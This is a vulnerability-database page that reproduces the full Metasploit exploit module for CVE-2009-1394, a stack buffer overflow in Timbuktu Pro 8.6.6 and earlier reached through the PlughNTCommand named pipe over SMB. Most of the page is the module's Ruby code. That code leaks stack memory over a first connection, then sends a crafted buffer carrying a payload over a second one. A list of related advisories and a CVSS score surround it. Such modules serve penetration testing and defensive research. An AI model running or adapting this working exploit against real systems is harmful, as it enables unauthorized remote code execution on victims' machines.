Lucene search
+L

Timbuktu PlughNTCommand Named Pipe Buffer Overflow

🗓️ 10 Dec 2009 08:24:37Reported by bannedit <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 32 Views

Timbuktu Pro <= 8.6.6 Named Pipe Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
circl
CVE-2009-1394
30 Apr 201000:00
circl
checkpoint_advisories
Motorola Timbuktu Pro PlughNTCommand Stack Based Buffer Overflow (CVE-2009-1394)
22 Jul 200900:00
checkpoint_advisories
cve
CVE-2009-1394
26 Jun 200918:00
cve
cvelist
CVE-2009-1394
26 Jun 200918:00
cvelist
exploitdb
Timbuktu 8.6.6 - PlughNTCommand Named Pipe Buffer Overflow (Metasploit)
30 Apr 201000:00
exploitdb
nvd
CVE-2009-1394
26 Jun 200918:30
nvd
openvas
Ubuntu USN-792-1 (openssl)
30 Jun 200900:00
openvas
packetstorm
Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow
31 Dec 200900:00
packetstorm
prion
Stack overflow
26 Jun 200918:30
prion
saint
Motorola Timbuktu PlughNTCommand named pipe string buffer overflow
13 Jul 200900:00
saint
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::SMB::Client

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Timbuktu PlughNTCommand Named Pipe Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6
        in a pretty novel way.

        This exploit requires two connections. The first connection is used to leak stack data
        using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying
        a large value for this argument it is possible to cause Timbuktu to reply to the initial
        request with leaked stack data. Using this data allows for reliable exploitation of the
        buffer overflow vulnerability.

        Props to Infamous41d for helping in finding this exploitation path.

        The second connection utilizes the data from the data leak to accurately exploit
        the stack based buffer overflow vulnerability.

        TODO:
        hdm suggested using meterpreter's migration capability and restarting the process
        for multishot exploitation.
      },
      'Author'         => [ 'bannedit' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2009-1394' ],
          [ 'OSVDB', '55436' ],
          [ 'BID', '35496' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'	=>
        {
          'Space'	=> 2048,
        },
      'Platform'	=> 'win',
      'Targets'	=>
        [
          # we use a memory leak technique to get the return address
          # tested on Windows XP SP2/SP3 may require a bit more testing
          [ 'Automatic Targeting',
            {
              # ntdll .data (a fairly reliable address)
              # this address should be relatively stable across platforms/SPs
              'Writable' => 0x7C97B0B0 + 0x10 - 0xc
            }
          ],
        ],
      'Privileged'		=> true,
      'DisclosureDate'	=> '2009-06-25',
      'DefaultTarget'	=> 0))

    deregister_options('SMB::ProtocolVersion')
  end


  # we make two connections this code just wraps the process
  def smb_connection

    connect(versions: [1])
    smb_login()

    print_status("Connecting to \\\\#{datastore['RHOST']}\\PlughNTCommand named pipe")

    pipe = simple.create_pipe('\\PlughNTCommand')

    fid = pipe.file_id
    trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')

    return pipe

  end


  def mem_leak

    pipe = smb_connection()

    print_status("Constructing memory leak...")

    writable_addr = target['Writable']

    buf = make_nops(114)
    buf[0] =  "3 " # specifies the command
    buf[94] = [writable_addr].pack('V') # this helps us by pass some checks in the code
    buf[98] = [writable_addr].pack('V')
    buf[110] = [0x1ff8].pack('V') # number of bytes to leak

    pipe.write(buf)
    leaked = pipe.read()
    leaked << pipe.read()

    if (leaked.length < 0x1ff8)
      print_error("Error: we did not get back the expected amount of bytes. We got #{leaked.length} bytes")
      pipe.close
      disconnect
      return
    end


    offset = 0x1d64
    stackaddr = leaked[offset, 4].unpack('V')[0]
    bufaddr = stackaddr - 0xcc8

    print_status "Stack address found: stack #{sprintf("0x%x", stackaddr)}  buffer #{sprintf("0x%x", bufaddr)}"

    print_status("Closing connection...")
    pipe.close
    disconnect

    return stackaddr, bufaddr

  end


  def exploit

    stackaddr, bufaddr = mem_leak()

    if (stackaddr.nil? || bufaddr.nil? ) # just to be on the safe side
      print_error("Error: memory leak failed")
      return
    end

    pipe = smb_connection()

    buf = make_nops(1280)
    buf[0] =  "3 "
    buf[94] = [bufaddr+272].pack('V') # create a fake object
    buf[99] = "\x00"
    buf[256] = [bufaddr+256].pack('V')
    buf[260] = [bufaddr+288].pack('V')
    buf[272] = "\x00"
    buf[512] = payload.encoded

    pipe.write(buf)

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.3High risk
Vulners AI Score7.3
CVSS 29.3
EPSS0.33281
32